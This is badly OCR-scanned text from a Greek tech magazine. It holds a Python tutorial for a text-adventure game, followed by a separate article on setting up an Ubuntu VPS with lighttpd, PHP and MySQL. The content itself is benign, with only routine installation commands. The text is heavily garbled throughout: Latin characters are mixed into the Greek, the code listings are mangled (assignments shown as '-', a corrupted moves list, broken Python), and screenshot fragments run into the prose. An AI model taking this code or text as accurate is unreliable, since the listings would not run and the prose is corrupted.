ρα σας εἶναι στο δωμάτιο των γονέων, ο πατέρας σας στο καθιστικὀ και 
ο αδερφὀς σας στο δωμάτιο του. Θα πρέπει να βρείτε τη διαδρομή για 
το δωμάτιο σας χωρίς να πέσετε πάνω σε κάποιον anó αυτούς. Φυσικά, 
υποτίθεται ὁτι δεν ξέρετε απὀ πριν nou εἶναι ο καθένας! (Μια ενδιαφὲ- 
pouca παραλλαγἠ θα ἦταν να κάνετε το παιχνίδι να τοποθετεί αυτούς 
τους χαρακτήρες σε κάποια τυχαία δωμάτια, ὥστε κάθε φορά που θα 
το τρέχετε να εἶναι διαφορετικὀ. Βέβαια, σε πολλὲς περιπτώσεις δεν θα 
υπάρχει λύση!) 


H λογική του προγράµµατος 
Σαν λογικἠ εἶναι ιδιαίτερα απλὀ: 


ο O παἰκτης ξεκινάει anó το δωμάτιο µε αριθμµὀ 0 (κήπος) και του 
εμφανίζεται η περιγραφἠ του χώρου, καθώς και οι πιθανὲς έξοδοι 
σε μορφὴ κατευθύνσεων (π.χ., «Νότια»). 


ο O παἰκτης δίνει την κατεύθυνση και, εφόσον εἶναι ἐγκυρη, ro npó- 
γραµµα τον nnyaivzi στο αντἰστοιχο δωμάτιο. 


ο Αν ο παἰκτης βρεθεἰ σε δωμάτιο που κερδίζει ἡ χάνει, τυπώνεται TO 
αντίστοιχο μήνυμα και η περιπέτεια τελειώνει. Διαφορετικά... 


e ..τυπώνονται η νέα περιγραφἠ και οι ἐξοδοι και επανερχόµαστε 
στο βήμα 2. 


Καθώς καταλαβαίνετε, το κύριο μέρος του προγράμματος εἰναι ἑνας βρὸ- 
xoc του τύπου «ὁσο ο παἰκτης δεν (ἐχασε ἡ κἐρδισε)». 


Τα δωμάτια 
To εὐκολο κομμάτι, εἶναι να κωδικοποιήσουµε τα δωμάτια. Θα χρησιµο- 
ποιήσουμε εδὠ µια λίστα της Python, την οποία, ευφάνταστα, ονοµάσαµμε 
rooms: 
rooms - [ "Βρίσκεσαι στον κήπο. Παντού σκοτάδι.", 
"βρίσκεσαι στο μπάνιο. Ακούς θόρυβο.", 


"βρίσκεσαι στο χωλ. Παραλίγο να σκοντάψεις. Σκάλα 
ανατολικά", 


"Βρίσκεσαι στην αποθήκη. H ατμόσφαιρα είναι 
αποπνικτική. Σκάλα Δυτικά, Μονοπάτι Νότια. ", 


Ἔφτασες στο καθιστικό. Βρήκες τον πατέρα σου.", 
"βρίσκεσαι στο σαλόνι. Ακούγεται μουσική.", 
"βρίσκεσαι στην τραπεζαρία. Τα πάντα εἶναι 
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ανάστατα.", 

"Βρίσκεσαι στο διάδρομο. Είναι σκοτεινά. Σκάλα 
Νότια", 

"Εἴσαι στη κουζίνα. Ακούς φωνές.", 

"Εἶσαι στον πάνω διάδρομο. Παντού ησυχία. Σκάλα 
Βόρεια.", 

"Εἶσαι στο δωμάτιο του αδερφού σου. O αδερφός σου 
σε μαρτυρά!", 

"Εἶσαι στο δωμάτιο των γονέων σου. H μητέρα σου σε 
έπιασε.", 


"Εἶσαι στο δωμάτιο σου. Εἶσαι ασφαλής." ] 
Παρατηρήστε ór! έχουμε περάσει τις περιγραφὲς µε την ἴδια σειρά (0-12) 
nou εἰδαμε πριν. Αυτό µας επιτρέπει να αποθηκεύσουµε το τρέχον δω- 
μάτιο (αυτό στο οποίο βρίσκεται ο παἰκτης τη δεδομένη στιγμὴ) σε µια 
μεταβλητή nou θα ονομάσουµε room. Έτσι, αν ο χρήστης βρἰσκεται στο 
δωμάτιο 2 (το χωλ), οι παρακάτω εντολὲς δίνουν την περιγραφή: 

room - 2 

print rooms [room] 

"Βρίσκεσαι στο χωλ. Παραλίγο va σκοντάψεις. Σκάλα ανατολικά" 
Πιστεύουμε Ori εἶναι αρκετά απλὀ να καταλάβετε ὁτι κάθε φορά το npó- 
γραμμα θα δίνει τη σωστὴ τιμὴ --με κάποιο τρὀπο nou θα δούμε-- στη 
μεταβλητή room και θα χρησιμοποιεὶ την παραπάνω print για να τυπώνει 
το μήνυμα. Αλλά noc θα κωδικοποιήσουμε την κίνηση απὀ το ¿va δωμά- 
TIO στο ἄλλο; 


Κατευθύνσεις και προορισμµοίἰ 


Δείτε ξανὰ το σχήμα του χάρτη. Παρατηρἠήστε στο κάτω μέρος τα βελά- 
κια των κατευθύνσεων: Έχουμε κωδικοποιήσει κἆθε κατεύθυνση µε éva 
αριθµὀ: Βόρεια = 0, Νότια = 1, Ανατολικἁ = 2, Δυτικά = 3. Φανταστείτε 
τώρα ὁτι βρίσκεστε στο δωμάτιο 9, nou ἐχει τέσσερις πιθανὲς εξόδους: 


Δωμᾶτιο προορισμοῦ 
0 (Βόρεια) 7 (Διάδρομος) 


Ii (θωμότι γονέων) 
2 (Ανατολικἀ) 12 (Δικὸ µας δωμάτιο) 
10 (Δωμάτιο αδερφοῦ) 


Ας δημιουργήσουμε µια λἰστα µε τους αριθμούς: 


destinations - [ 7, 11, 12, 10 ] 


Το στοιχείο destinations[0] θα εἶναι 7, το destinations[1] θα εἶναι 11 κλπ. 
Παρατηρεἰτε κάτι; 


O δείκτης της λίστας συμβολίζει την κατεύθυνση, και το αποτἐλεσµα τον 
προορισμό! Αν λοιπὸν ο χρήστης εἶναι στο δωμάτιο 9, και επιλέξει ως 
κατεύθυνση το 1 το δωμάτιο που θα βρεθεἰ θα εἶναι: 


room - destinations[1] 
και μετὰ TO µόνο που μένει εἶναι va τυπώσουμε TO μήνυμα: 


print rooms[room] 


Python games: programming xshouldx be fun! 
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Ti γίνεται σε περίπτωση nou µια κατεύθυνση δεν υπάρχει σε κἄποιο δω- 
μάτιο; Αυτή την κωδικοποιούμε µε το -1. Ελἐγχοντας yia το -1, ὀταν 
δεχόμαστε εἰσοδο απὀ το χρήστη, δεν του επιτρέπουµε να δώσει κατευ- 
θύνσεις που δεν αντιστοιχούν σε ἐξοδο στο δωμάτιο που βρἰσκεται. 


Βέβαια ο χρήστης καλὸ θα εἶναι να δίνει εντολὲς µε λέξεις και ὀχι αριθ- 
μούς, αλλά αυτό εἶναι µια λεπτομέρεια που θα δούμε αργότερα. 


Αυτὸ που δεν εἶναι λεπτομέρεια εἶναι το εξής: Μια λίστα όπως η napa- 
πάνω µπορεί να κρατάει μόνο τα δεδομένα κἰνησης για ἑνα δωμάτιο. Τι 
γίνεται µε εμάς που έχουμε 13 δωμάτια; 
moves - [ [-1,2,-1,-1], 

Γι ο τς 

[0,5,3,1], 

[-1,8,-1,2], 

[-1,6,5,-1], 

[2,8, -1,4], 

[4,7, -1,-1], 

[6,9,8, -1], 

[3o cil cito zs 

[ον 11512710} 

[ΠΡ 

|I cb eto της 

[-1,-1,-1,9] ] 
Xa! Έχουμε µια λίστα nou nepi£yei λἰστες! Πα va δούμε, av καταλάβατε 
τι κάναμε: Ti θα περιέχει το moves[9]; Θα περιέχει τη λίστα µε τους npo- 
ορισμούς για κάθε κατεύθυνση απὀ το δωμάτιο 9, δηλαδὴ τα ακόλουθα: 

[7, 11, 12, 10 ] 

Σε οποιαδήποτε Aoinóv περίπτωση --και yia οποιαδήποτε τιµή της µετα- 
βλητής room, δηλαδή ro δωμάτιο που βρισκόμαστε τη δεδομένη στιγ- 
μή--, ισχύει 


destinations - moves [ room ] 


Ki όταν ο χρήστης επιλέξει µια κατεύθυνση, απὀ 0 ως 3, η οποία ano8n- 
κεύεται στην μεταβλητἠ direction, το νέο δωμάτιο θα εἶναι 


room - destinations [ direction ] 
Ἐπειτα, φυσικἀ, ακολουθεί το 
print rooms[room] 


E, καθὼς καταλαβαίνετε, αυτό εἶναι ὁλο! Μένουν βέβαια κάποιες λεπτο- 
μέρειες... 


Ανίχνευση Νίκης / Αποτυχίας 


Υπάρχει µια λίστα, η winrooms, που περιέχει τα δωμάτια στα οποία το 
παιχνίδι τελειώνει µε νίκη του παίκτη. Στο συγκεκριμένο παιχνὶδι εἶναι 
μόνο va, αλλά θα μπορούσε va εἶναι περισσότερα. Αντίστοιχα υπάρχει 
η λίστα lossrooms, που περιἐχει τα δωμάτια στα onoia o παἰκτης χάνει! 
H Python μπορεί πολύ γρήγορα να ελέγξει αν κάποια τιµή υπάρχει σε µια 
λίστα: 
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if room in winrooms: 
print "Κέρδισες!" 
Τελικά, εἶναι πολύ απλὀ! 
Κατεβάστε ro πλήρες πρόγραμμα απὸ την τοποθεσία http://bit.ly/ 


dhOO6adventure. Το πρὀγραμµα χρησιμοποιεὶ συναρτήσεις, για τις οποίες 
μιλάμε εκτενὼς στο ἆρθρο 2.5, στο site του περιοδικού: 


http://deltahacker.gr/?p-4848 


Εκεἰ περιγράφουµε και τη λειτουργία της συνάρτησης getInput, η οποία 
βρίσκει ποιες εἶναι οι ἐγκυρες κατευθύνσεις ανάλογα µε το δωμάτιο και 
δέχεται (κι επαληθεύει!) την εἰσοδο του χρήστη, ὀχι σε αριθμούς αλλά 
με κανονικὲς εντολὲς. To πρὀγραμμὰ µας ξεκινάει να εκτελεἰται απὀ τη 
βασικἠ συνάρτηση main, λόγω της εντολής 
if name --" main *": 
main() 

Av ἐχετε ασχοληθεἰ µε κάποια ἄλλη γλὠσσα προγραμματισμού (C, 
anyone?) θα ἐχετε ἴσως συναντήσει τη συνάρτηση µε ro ὀνομα main απὀ 
την οποία, τυπικἀ, ξεκινάει η εκτέλεση ενὸς προγράµµατος. Στην Python 
δεν εἰμαστε υποχρεωμένοι να ἐχουμε τέτοια συνάρτηση -- και στο npo- 
το µας πρὀγραμμα πράγματι δεν εἰχαμε. Εἶναι ὠστόσο συνηθισμένο va 
βάζουμε σε µια συνάρτηση main το κύριο κομμάτι του κὠδικά µας. Όταν 
καλούμε το πρὀγραμμα anó τη γραμμή εντολών (ἡ To εκτελούμε µέσω 
του idle) η ειδικἠ µεταβλητὴ | name, παίρνειτηντιμἠ || main, , £ni- 
τρἐποντάς µας ἑτσι va καλέσουμε την κύρια ρουτίνα του προγράμματὸς 
μας µε rov τρόπο που βλέπετε παραπάνω. 


Κύριο πρὀγραμμα 
O βασικὸς βρὀχος εἶναι ο ακόλουθος: 


room - 0 
endgame - False 
while not endgame: 
print rooms[nroom] 
if room in winrooms: 
print "Κέρδισες! H περιπέτεια τελείωσε." 
endgame - True 
elif room in lossrooms: 
print 'Έχασες! H περιπέτεια τελείωσε." 
endgame - True 
else: 
direction - getInput(moves, room) 
destinations = moves[room] 
room - destinations[direction] 


Η μεταβλητή direction ἐχει την κατεύθυνση nou έδωσε o παἰκτης, σε 
µορφή αριθμού. To τέλος rou παιχνιδιού σηματοδοτείται µε τη μεταβλητή 
endgame, η οποία γίνεται True όταν φτάσουμε στο winroom ἡ σε éva anó 
τα lossrooms. H μεταβλητή direction μπορεί να εἶναι 0, 1, 2 ἡ 3 ανάλογα 
µε την εἰσοδο του χρήστη. 
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| File Edit Formst Run Options 
print "Ἔξοδοι:", 
for i in destinations: 
if i!2-1: 

print directio 
possiblemoves. 
index 1-51 
print "in" 
Uscrinput ee . {|ou θες να πας;Ἀνατολικά 

while userinput not i Βρίσκεσαι στο χώλ. Παραλίγο να σκοντάψεις. Σκάλα ανατολικά 


userinputeraw inpu ἘΈξοδοι: Βόρεια Νότια Ανατολικά Δυτικά 
return directions.indę 


File Edit Shell Debug Option Windows Help 
Έξοδοι: 


Ανατολικά 


| rov θες να πας;Ἀνατολικά 

]βρισκεσαι στην αποθήκη. H ατμόσφαιρα είναι αποπνικτική. Σκάλα Δυτι 
|x&, Μονοπάτι Νότια. 

]Έξοδοι: Νότια Δυτικά 


def main(): 
# Room descriptions 


rooms — [ "Ἔρισκεσαι d 
"ΕἜρίσκεσαι di 
"Βρίσκεσαι d 
"Ἔρισκεσαι d 
"Ἔφτασες ordii 
"Βρίσκεσαι d 
"Ερίσκεσαι di 
"Βρίσκεσαι dilmrosoi: Βόρεια Νότια Δυτικά 
"Είσαι στη Ni 
"Είσαι στον 
"Είσαι στο ὃ 
"Είσαι στο ἃ 
"Είσαι στο ἃ 


που θες να πας;Νότια 
Είσαι στη κουζίνα. Ἀκούς φωνές. 


|Ln: 1113 Col: 4 


ent py" DN eskto 
File Edit Format Run Options Windows Help 


surfacecolor - (50,80,250) 

Screen - pygame.display.set mode((screenwidth, screenheight), 0, 32) 

screen.fill(surfacecolor) 

colorlist - [ (253,53,8), (23,233,9), (0,0,0), (202,228,7), (1,191,0), 
(204,34,254), (255,255,255), (75,0,244), (0,239,0), 
(242,17,251), (249,50,0), (188,185,192), (108,40,251), 
(253,80,0), ((185,215,0), (253,47,3) 1 


# Setup some fonts and text messages 


headerfont = pygame.font.SysFont("Tahoma",48) 

textfont = pygame.font.SysFont("Tahoma",22) 

header text = headerfont.render("The Adventure!", True, (255,0,0), (255,255,0 
win text = textfont.render(u"Képóioec! H περιπέτεια τελείωσε.", False, (255, 
lose text = textfont.render(u"EyaceCc! H περιπέτεια τελείωσε." False, (255,2 


*OIDi( d pygamewindon πο ο o oo lerem ] 


rooms 


"EÍcvi ata δωιώτιω Gon. Είσαι απλής.” 1 


Επιτρέψτε µου ropa va θέσω την perafAnrr| endarticle = True kai va σας 
καλέσω στο άρθρο 2.5 nou θα βρείτε στο site του περιοδικού (εἴπαμε, στο 
http://deltahacker.gr/?p-4848 :D). Στο τεύχος 007 θα κάνουμε εισαγωγἠ 
στο pygame και θ΄ αρχίσουμε να γράφουμε τις πρῶτες µας πολύχρωμες 
εφαρμογὲς γραφικών! 


Εικόνα 4 

Η εκτέλεση του 
προγράµµατος στο 
περιβάλλον της 
Python. 


Εικόνα 5 
Επειδή ξέρω ότι 
θέλετε (εντάξει, 

πεθαίνετε) να 
δείτε πὠς θα 
ἦταν το παιχνίδι 
αν εἶχε γραφικά, 
δείτε το µέσω py- 
game. Φυσικά, 
η βασική μηχανή 
εἰναι ἴδια, αλλά το 
υπόλοιπο θα σας 
φανεί ακατάλη- 
πτο -- τουλά- 
χιστον για την 
ώρα. Μπορείτε 
va ro κατεβό- 
σετε απὀ εδώ: 
http://bit.ly/ 
dheee6advpygame. 
Πριν το τρέξε- 
τε οφείλετε να 
εγκαταστήσετε 
το pygame (Πα 
τα windows θα 
το βρείτε στο 
www.pygame.org/ 
download.shtml, 
ενώ yia ro Linux 
κοιτάξτε στο 
repository της 
διανομής σας.) 


WordPress, lighttpd, 


Tags: VPS, Ubuntu, 
web servers 


53}, MYSQL, PEP, 


Beginner 


6iannoubD 


μ.μ. πα ἈΚ: 


! "74" 9? »- 1*4 * 


— — P ο ο“ 
Καπάκ 

o Ww D. .-e.e194.99 ον ο 
zc ) 0 BUE Sm domom mq, 
ον σαι Ψη μα ο οφ 
ον σσ συ 


εἰμαστε ἐτοιμοι να μετατρέψουμε 
ασφαλἠ web server! 


κ δα... ο ον μμ 


CUTTTTaa CU XY RUPEE 


t: 
) 207.9 ""—**17*-***?**-73* 


ΜΒΑ... 1... 


O server περιμένει µε χαρά τις εντολὲς 


μας! Εντάξει, ἴσως ὀχι µε Χαρά, αλλά µε µια 
το VPS µας σ’ ἑναν ικανότατο κι αρκετά 


m—-——PFPFCTPPTr gd ον τ -ᾱ-υ. 
«μμ... 


μυών acce : 
T7 oT OP $ PR 


σχετικἠ άνεση. Αφού anopakpüvaps κἆθε 
πακέτο nou σπαταλούσε ἐστω κι ελάχιστους 


πόρους, 


di b < 
777777775 EHE ην.” àh^ É!X 39.  / 
TOT 10] ῳ του 


Tm 
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Στο πρώτο µέροςτου άρθρου, που ξεκινά anó rr] σελἰδα 44 rou deltaHacker 
005, αναφἐραµε μεταξύ άλλων μερικὲς αξιόλογες πηγὲς ενημέρωσης για 
τις πιο ενδιαφέρουσες προσφορές στην ayopå των VPS. Επιπρὀσθετα, 
αναφερθἠκαµε στις παγίδες του χώρου αλλά και στο noc μπορούμε va 
τις αποφεύγουμε. Πα τοην σκοπὀ της παρουσἰασἠς µας επιλέξαμε ἑνα 
αρκετά μικρὸ και φθηνό VPS, µε κόστος μόλις 3,50 δολάρια το μήνα. 
Έχουμε βαλθεῖ, βλέπετε, να σας αποδεἰξουµε ὁτι ακόµα κι ἑνα τόσο Ol- 
Kovouikó VPS µπορεἰ v' αποτελέσει ¿vav πρώτης τάξεως web server, για 
τις ανάγκες ενὸς μικρού site! Το πρώτο πράγμα που κάναμε όταν αποκτἠ- 
caue πρὀσβαση στην κονσόλα του server µας ἧταν να καθαρίσουμε το 
σύστημα απὀ τα πακέτα που θεωρούμε περιττά, ὥστε να εξασφαλίἰσουμε 
ὁτι δεν σπαταλούνται πόροι ἀσκοπα. Σε auró το άρθρο θα αναφερθούμε 
στη µετατροπἠ του μικρού µας VPS σ’ ¿vav ελαφρύ αλλά ικανότατο web 
server. Θα εξετάσουμε βήμα προς βήμα την εγκατάσταση των αναγκαίων 
πακέτων, καθώς και μερικών πρὀσθετων nou θα διευκολύνουν τη διαχεἰ- 
ριση του συστήματος. Τέλος, θα ασχοληθούμε και µε την ασφάλεια του 
server! Μπορεἰ va µη φτιάξουμε ἑναν 102% ασφαλή server, αλλά θα eni- 
σηµάνουµε ὁλα ὁσα πρέπει να προσέχει κάποιος ο οποίος ἐχει τον πλήρη 
ἐλεγχο του server και δεν βρίσκεται κάτω anó την ομπρέλα ασφαλείας (;) 
µιας εταιρἰας web hosting. 


Διαχείριση µε το χέρι 


To βασικότερο πρόβλημα που θα συναντήσει ἑνας αρχάριος κατὰ τη pE- 
τἀβαση anó µια υπηρεσία shared hosting σε ἑνα virtual private server, 
αφορά στο nog γίνονται οι ρυθμίσεις. Σε ἑνα VPS yivovrai όλα µε TO χὲρι 
και δεν υπάρχει κανένα μαγικὀ κουμπάκι ἡ τσεκ μποξ, το onoio να ενερ- 
γοποιεἰ ἡ απενεργοποιεί τις επιθυμητές λειτουργίες. Ευτυχώς πάντως δεν 
υπάρχει κανένας λόγος πανικού, αφού τα πράγματα παραμένουν εξίσου 
εὑκολα! Ti; Δεν µας πιστεύετε; Καλά, ας ξεκινήσουμε και στην πορεία 
εἶμαστε σίγουροι ὁτι θα σας πεἰσουμε. 


Σε µια υπηρεσία shared hosting, yia να ρυθμίσουμε το domain name nou 
έχουμε αγοράσει αρκεἰ va το δώσουμε στο σύστημα της εταιρἰας και θα 
γίνουν τα πάντα αυτόματα. O web host τρἐχει το δικὀ του DNS server και 
φροντίζει να δημοσιεύσει αυτόματα την αντιστοιχἰα του domain name µε 
την κατάλληλη διεύθυνση IP του server. Επιπρόσθετα, ο web host μπορεὶ 
να σετἀρει πανεύκολα και πολλὰ virtual hosts. Έτσι, µπορεἰ va µας εξα- 
σφαλίσει άνετα ὁτι δύο διαφορετικά sub-domain, για παράδειγµα τα blog. 
giannoug.gnr και my.giannoug.gr, θα παραπέμπουν στην ἴδια διεύθυνση IP. 
Τώρα nou αποφασίσαμε να παϊξουµε μπάλα pe ro δικὀ µας VPS, θα πρέπει 
να ξεχάσουμε αυτές τις ευκολίες. Ἡ μήπως ὀχι; Πα αρχἠ θα χρειαστεί va 
βρούμε ¿vav DNS host. Οι περισσότεροι registrar, oi εταιρίες δηλαδή απὀ 
τις οποίες αγοράζουμε domain names, προσφέρουν το δικὀ τους DNS 
host. Αυτή η επιλογή εἶναι η απλούστερη και η ευκολότερη, αλλά δεν 
εἶναι πάντα διαθέσιμη. Ορισμένοι μικροὶ και ornvoi registrar δεν npo- 
σφἐρουν υπηρεσίες DNS. Καλὸ θα ἦταν λοιπὸν να ἐχουμε υπόψη µας και 
µια εναλλακτικἡ λύση: Το ὀνομὰ της εἶναι PointHQ και θα τη βρείτε στο 
pointhq.com. Από τη συγκεκριμένη υπηρεσία, αφού δημιουργήσουμε ἑναν 
δωρεὰν λογαριασμὀ, μπορούμε va καθορἰσουµε πού θα παραπέμπει το 
κύριο domain, καθώς κι όλα τα sub-domains. Βέβαια, pe To δωρεάν λογα- 
ριασμὀ δεν θα έχουμε λεπτομµερέστατο ἐλεγχο. Πα να puOuicoupe κάθε 
sub-domain ξεχωριστά (ώστε va δεἰχνει το καθένα σε διαφορετικἠ IP), 
απαιτεἰται λογαριασμὸς eni πληρωμή. lia ro δικὀ µας σκοπὀ, ωστόσο, η 
δουλειά γίνεται δωρεάν. Στο θέμα του domain θα επανέλθουµε αργότερα. 
Πα την opa θα σηκώσουμε ra pavikia µας και θα μετατρέψουµε ro VPS 
μας σε web server! 
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ΞΕ Point - Records for tutz.gr 
e Q 4 Q https://pointhq.com/zones/17292/records 


point 


DNS HOSTING 


Upgrade to 
PointPremium 


Upgrade now! fe 


Add New Record 


= Add a Web Redirection 
* Manage E-Mail Forwarding 
= Setup SPF Record 


B0.83.121.244 


& A 
q 


a 


80.83.121.244 
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ALT1.ASPMX.L.GOOGLE.COM. 


ALT2.ASPMX.L.GOOGLE.COM. 


η 


a 


ASPMX.L.GOOGLE.COM. 


ES uz. ASPMX2.GOOGLEMAIL.COM. 


8 


ES tutzgr. ASPMXS.GOOGLEMAIL.COM. 5 
- Which nameservers? 


When registering your domain you 
should use the nameservers below: 


8 


tutz.gr. ASPMX4.GOOGLEMAIL.COM. 


& s & 5 5 8 


8 


Επ tz. ASPMXS.GOOGLEMAIL.COM. 


dnsi.pointhq.com 
dns2.pointhq.com 
Records marked with a $ symbol cannot be changed or removed from this domain as they are XR d com 
à "ues 9 iS4.pointhq.com 
required to operate. Other records can be edited by selecting either of the two icons. dnss.poinchq com 
We'll be adding more nameservers all 
the time and we'll email you when we do 
50 you can update your domains if you 
wantto. More details 


co d eb ase Are you a web or software developer? Need somewhere to version & store your code? Yes? 
Codebase is a complete project management system for your software. It includes full Git, Mercurial and Subversion repository 
hosting along with all the tools you'd expect to find in a project management package - including ticketing, milestones. wikis. 
time tracking & more. Poit [αὶ atechidentty 


Σερβίρισµα αλά lighttpd Το περιβάλλον 

διαχείρισης του 
O lighttpd εἰναι ἴσως ο ελαφρύτερος web server Εκεἰ Έξω (TM). Μπορεί o PointHQ. Μέσα απὀ 
Apache va εἶναι δημοφιλέστερος κι ενδεχομένως πιο πλούσιος σε δυνα- αυτό το απλὀ user 
τότητες, αλλά ο lighthtpd εἶναι ταχύτατος, απαιτεί λιγότερη μνήμη και θα interface μπορού- 
κάνει τη δουλειἁ µας χωρἰς κανένα πρόβλημα. Όπως εἰπαμε αρκετὲς φο- 2 d UE 
ρὲς, ro σὐστημὰ µας δεν αφήνει καθόλου περιθώρια για σπατάλη πόρων οποίο καθορίζει την 
κι έτσι ο lighttpd αποτελεἰ μονόδρομο. Να σημειώσουμε ὁτι υπάρχουν αντιστοιχία μεταξύ 


και ἄλλες επιλογές, ὁπως o nginx, αλλά o lighttpd εἶναι απλούστερος στη domain name Και 
ρύθμιση και τον αγαπάμε ;) διεύθυνσης IP. Επι: 
πρόσθετα, μπορού- 

Η εγκατάσταση εφαρμογών στο Ubuntu και γενικότερα στα συστήµατα µε να ρυθµίσουµε 
Debian γίνεται µε rov πλέον κλασικὀ και πασίγνωστο rpóno, xpnoiponoi- . ακόμα 
ὠντας ro apt-get. Αρχικά θα χρειαστεἰ va ανανεώσουμε τη βάση µε τα i να 
πακέτα, ὁπως κάναμε και κατά την αναβάθμιση του συστήματος. AUTÒ στην ανταλλαγή 
παρεμπιπτόντως δεν χρειάζεται va το κάνουμε κάθε φορὰ που θέλουμε αλληλογραφίας 
va εγκαταστήσουµε κάποιο πακέτο, εκτὸς αν ἐχουν περάσει μέρες ano (MX). Αλλά αυτὀ 
την τελευταία εγκατάσταση. το τελευταίο έχει 
νόημα μόνον αν 

apt-get update έχουµε στήσει 

A ; i ; ; ` TOV δικὀ µας mail 
Πλέον, το σύστημα ἐχει ενημερωθεί για τις τελευταῖες εκδόσεις TWV δια- server. 


θέσιμων πακέτων, απευθείας anó ra repositories του Ubuntu. Τώρα uno- 
ρούμε να εγκαταστήσουμε ro lighttpd, δίνοντας auro: 


apt-get install lighttpd 
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EP root okazaki: ~ E ES 


O lighttpd &ivai 
εγκατεστημένος 
και μέσα στο /var/ 
www βρίσκονται 
όλα τα αρχεία 

που θέλουμε va 
σερβίρει. Ma- 
ρεμπιπτόντως, 
αγνοείστε εντε- 
Aoc τα warning 
που εμφανίζει o 
lighttpd σε αυτὀ 
ΤΟ screenshot. 
Αποτελούν προϊόν 
της τεμπελιάς TOU 
αρθρογράφου. 
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Μη νομίζετε ὁτι μετά θα χρειαστούμε πολλὲς και περίπλοκες ρυθμίσεις. 
O web server εἶναι εγκατεστημένος αλλά κι ἐτοιμος να σερβίρει οποια- 
δήποτε σελίδα του δώσουμε! Πα va rov δοκιµάσουμε αρκεἰ να δώσουμε 
τη διεύθυνση IP του VPS µας σε κάποιον web browser. Τα αρχεία που 
σερβἱρει ο lighttpd βρίσκονται στον κατάλογο /var/www. Αυτός ο φάκε- 
λος, δηλαδἠ, αποτελεἰ το λεγόμενο default document root. Πα την opa, 
όμως, ο server µας δεν υποστηρίζει δυναμικὲς σελίδες. Του λείπει βλέπε- 
τε η υποστήριξη της γλὠσσας PHP. Ας το φροντίσουμε κι αυτό... 


Υποστήριξη ΡΗΡ 


Όλα τα γνωστά CMS, ὁπως ro WordPress και ro Joomla, εἶναι γραμμένα 
στη γλὠσσα PHP. Επομένως yia να λειτουργήσουν, το σὑστημά µας θα 
πρέπει να διαθέτει τον σχετικὀ interpreter. Χωρίς αυτόν, o lighttpd θα 
σερβίρει τον κὠδικα PHP σαν απλὸ κείμενο! Για να κάνουμε το web server 
να διοχετεύει τον κὠδικα PHP στον interpreter της PHP, αρκεἰ va εγκατα- 
στἠσουµε το πακέτο php5-cgi: 


apt-get install php5-cgi 


Εφόσον χρησιμοποιούμε κάποια πρὀσφατη ἐκδοση rou Ubuntu ἡ του 
Debian, οι σχετικὲς ρυθμίσεις για τον lighttpd θα πραγματοποιηθούν au- 
τόµατα και η PHP θα δουλεύει σχεδὸν αμέσως. Anó μέρους µας χρειάζε- 
ται μόνο να την ενεργοποιήσουμε, τρέχοντας το ακόλουθο: 


lighttpd-enable-mod fastcgi fastcgi-php 


Στη συνἐχεια επανεκκινούµε rov web server (ὀχι ολόκληρο ro σύστημα!) 
δίνοντας το παρακάτω: 


service lighttpd restart 


Τώρα πρέπει va σιγουρευτούµε ὁμως ὁτι όλα λειτουργούν σωστά, ἐτσι 


Python games: programming xshouldx be fun 
ri t ΩΩ 


(2) phpinfo 
€ Q fi © 80.83.121.244/test php 


Linux okazaki 2.6.18-194.26.1.e15.028stab081.1 #1 SMP Thu Dec 23 20:17:23 MSK 2010 i686 
Dec 13 2011 18:29:47 


CGl/FastCGl 


disabled 


20090828 


δεν εἰναι; Για το σκοπὀ αυτό θα φτιάξουμε va αρχείο µε κὠδικα PHP και 
θα ro ρίξουμε στο document root του lighttpd. Εντός του αρχείου θα γρά- 
Ψουμε µια συνάρτηση που τυπώνει πληροφορίες για την εγκατεστημένη 
ἐκδοση της ΡΗΡ: 


echo "<?php phpinfo(); 22" > /var/www/test.php 


Όταν ζητήσουμε το συγκεκριµένο αρχεἰο απὀ κἀποιον browser κι εφόσον 
λειτουργούν όλα σωστὰ, θα πρέπει να δούμετις πληροφορίες για την PHP 
κι ὀχι τον κώδικα. Ας δούμε λοιπὀν τα κατορθώματά µας! Αφού ανοίξουμε 
vav browser, αρκεἰ να επισκεφθούμε τη διεύθυνση της µορφής http:// 
my-server-ip/test.php. 


Av χρειαστεἰ στο μέλλον va εγκαταστἠήσουµε kánoio πρὀσθετο της PHP, 
όπως, π.χ., το CURL ἡ το ImageMagick, μπορούμε να εντοπἰσουµε το OXE- 
τικὸ πακέτο πανεύκολα, δίνοντας κάτι τέτοιο: 


apt-cache search php5-* 


Στη συνέχεια μπορούμε va ro εγκαταστήσουµε pe TO γνωστὸὀ τρόπο, όπως 
θα κάναμε µε οποιοδήποτε ἄλλο πακέτο του συστήματος. Σημειώστε ὁτι 
αν εγκαταστήσετε κάποιο πρὀσθετο της PHP, θα πρέπει στη συνέχεια va 
επανεκκινήσετε ro lighttpd. 


ΜΥ-Βάση-Δεδομένων ;) 


Όλα τα CMS χρειάζονται vav μηχανισμό yia την αποθήκευση του περιε- 
χομένου. Eire μιλάμε για ολὀκληρα άρθρα στο WordPress, εἶτε για απλά 
κειμενάκια στο Joomla, απαιτεἰται µια βάση δεδομένων. Ως γνωστό, η 
MySQL αποτελεἰ τη δημοφιλέστερη επιλογἡ και την υποστηρἰζουν όλα τα 
γνωστά CMS. Επιπλέον, ὁπως θα ἐχετε ἡδη καταλάβει, η PHP και η MySQL 
πάνε πακέτο! H MySQL αποτελεἰ μάλλον το βαρύτερο npóypaupa που θα 
φορτώσουμε στο μικρὸ µας VPS και χρειάζεται ιδιαίτερη προσοχὴ κατά τη 
ρὐθμισή της. Ας ξεκινήσουμε µε την εγκατάσταση: 


Εφόσον ἐχει εγκα- 
τασταθεί σωστά η 
PHP, ο κώδικας του 
αρχείου test.php 
θα εκτελεστεί και 
δεν θα εμφανιστεί 
σαν anAó κείμενο. 
Έτσι, κάνοντας 

τη δοκιμή µας 

απὀ κάποιον web 
browser, θα πρέπει 
να δούμε κάτι σαν 
GUTÓ που φαίνεται 
στην εικόνα. 
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To phpMyAdmin, 
όπως φαίνεται 
αµέσως μετά την 
εγκατάστασή του. 
Πρόκειται yia µια 
απὀ τις τελευταίες 
εκδόσεις TOU πα- 
κέτου και διαφέρει 
αρκετά απὀ τις 
παλιατζούρες που 
χρησιμοποιούν 
ακόµα oi διάφο- 
po! web host... Ti 
περιμένατε; 


Aih phpMyAdmin 
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apt-get install mysql-server mysql-client 


H παραπάνω εντολἠ εγκαθιστἁ το MySQL server αλλά και rov επίσημο 
client. Σημειώστε ὁτι κατά την εγκατάσταση θα χρειαστεί να ορίσετε ¿va 
password yia το χρήστη root της MySQL. Κατά τα γνωστά, θα πρέπει 
